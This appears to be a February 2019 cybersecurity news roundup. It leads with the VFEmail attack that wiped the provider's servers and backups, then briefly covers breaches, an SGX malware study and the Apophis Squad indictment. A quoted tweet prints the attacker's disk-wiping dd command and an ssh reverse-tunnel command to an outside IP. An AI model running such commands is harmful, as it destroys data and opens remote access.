A cyber attack on email provider VFEmail caused “catastrophic destruction,” with hackers wiping the servers and backups.

Credit: Dmitry Ratushny

Some cyber attacks are so disastrous that there’s no coming back from them. Email provider VFEmail worried that was the case when it said a hacker caused “catastrophic destruction” on Monday by destroying all data on U.S. servers, as well as the backup systems.

On Monday morning, after VFEmail’s site, servers, and webmail client went down, VFEmail tweeted:

This is not looking good. All externally facing systems, of differing OS’s and remote authentication, in multiple data centers are down.
— VFEmail.net (@VFEmail) February 11, 2019

A few hours later, VFEmail said it caught a hacker trying to format a backup server:

Caught the perp in the middle of formatting the backup server: dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559 via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N
— VFEmail.net (@VFEmail) February 11, 2019

VFEmail then tweeted, “I fear all US based data may be lost.” The unknown attacker had wiped all the disks on every server:

At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provider were intact, and service should be up there.
— VFEmail.net (@VFEmail) February 11, 2019

The hacker was out for blood — “just attack and destroy.”

Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy.
— VFEmail.net (@VFEmail) February 11, 2019

In one fell swoop, an attacker had destroyed VFEmail’s “entire infrastructure.” As for the “scary part,” Romero tweeted:

Not ‘A’, an entire infrastructure. Mail hosts, VM hosts, sql server cluster, hosted vms.
If they all had one password, sure, but they didn’t. That’s the scary part.
— Havokmon (@Havokmon) February 12, 2019

On Monday, free users were advised to “not attempt to send email” because “there is currently no delivery for free accounts.” The incident page warned: “At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK. If you reconnect your client to your new mailbox, all your local mail will be lost.”

VFEmail service has since been restored, and new mail is being delivered. Today, users were advised, “If you are unable to login, send yourself an email from another location. Receipt of an email creates your new mailbox.” The email provider is discussing possible data recovery options with an unnamed vendor.

As pointed out by Krebs on Security, this is far from the first time that VFEmail has been the victim of a targeted attack. It was disrupted by DDoS attacks in 2015, 2017, and 2018 when Romero tweeted, “After 17 years if I was planning to shut it down, it’d be shut down by me – not script kiddies.”

More cybersecurity news

Researchers devise method to hide malware in Intel systems so antivirus can’t get to it

While we’re on the topic of scary stuff, security researchers came up with a new technique to hide malicious code from security software on systems that have Intel processors by burying the malware in the secure memory of Intel SGX enclaves. In addition to writing a research paper (pdf), the researchers also published proof-of-concept code that can bypass “ASLR, stack canaries, and address sanitizer, the overall exploit process took only 20.8 seconds.”

Websites and companies hacked

Sixteen sites were hacked and then the resulting 617 million account details were stolen and put up for sale on the dark web; the data is selling for less than $20,000 in bitcoin.
According to The Register, the hacked sites included 500px, MyFitnessPal, Dubsmash, MyHeritage, Whitepages, Fotolog, ShareThis, HauteLook, 8fit, EyeEm, Artsy, Animoto, BookMate, Armor Games, CoffeeMeetsBagel, and DataCamp.

Speaking of hacked, Dunkin Donuts admitted (pdf) to suffering another credential stuffing attack – it’s the second time in a three-month period.

Also, Truluck’s Seafood, Steak & Crab House announced the compromise of payment card information after it was notified by the FBI about potential unauthorized access. Affected customers will have made purchases between November 21, 2018, and December 8, 2018, at the following locations: Houston (Downtown), Houston (The Woodlands), Dallas, Austin (Downtown), Austin (Arboretum), Naples, Southlake, and Chicago.

Apophis Squad hacker faces 11-count federal indictment

Remember in December when hundreds of schools and businesses received fake bomb threat emails? The Justice Department announced that the FBI had arrested a 20-year-old North Carolina man who is part of the hacking group Apophis Squad. Timothy Vaughn faces an 11-count federal indictment that could land him a maximum sentence of 80 years in prison. The second defendant, and 19-year-old alleged leader of the group, was arrested in the U.K. last year and sentenced to three years in prison for making a bogus threat targeting an airliner.

You may remember when the Apophis Squad had bragged:

Feds cant touch us. NCA cant touch us. KEK we the big bois running around the internet with our 1337 bootnet! Come catch us we are untouchable! Living on TOR nodes and Open DNS.
Smoking that good stuff with our bois at radware.
— APOPHIS SQUAD (@apophissquadv2) July 18, 2018

Amusing tweets from the week

“Beg bounty” – new term for the day

I just learned a new term – “beg bounty” ie scanning a network without permission and then asking to be paid for vulnerabilities found
— Quentyn Taylor (@quentynblog) February 13, 2019

A true, yet funny comment by security expert Jeremiah Grossman in response to the question, “Without using the title of your job, tell me what you do.”

Make people afraid of computers. https://t.co/plVvirBkzD
— Jeremiah Grossman (@jeremiahg) February 13, 2019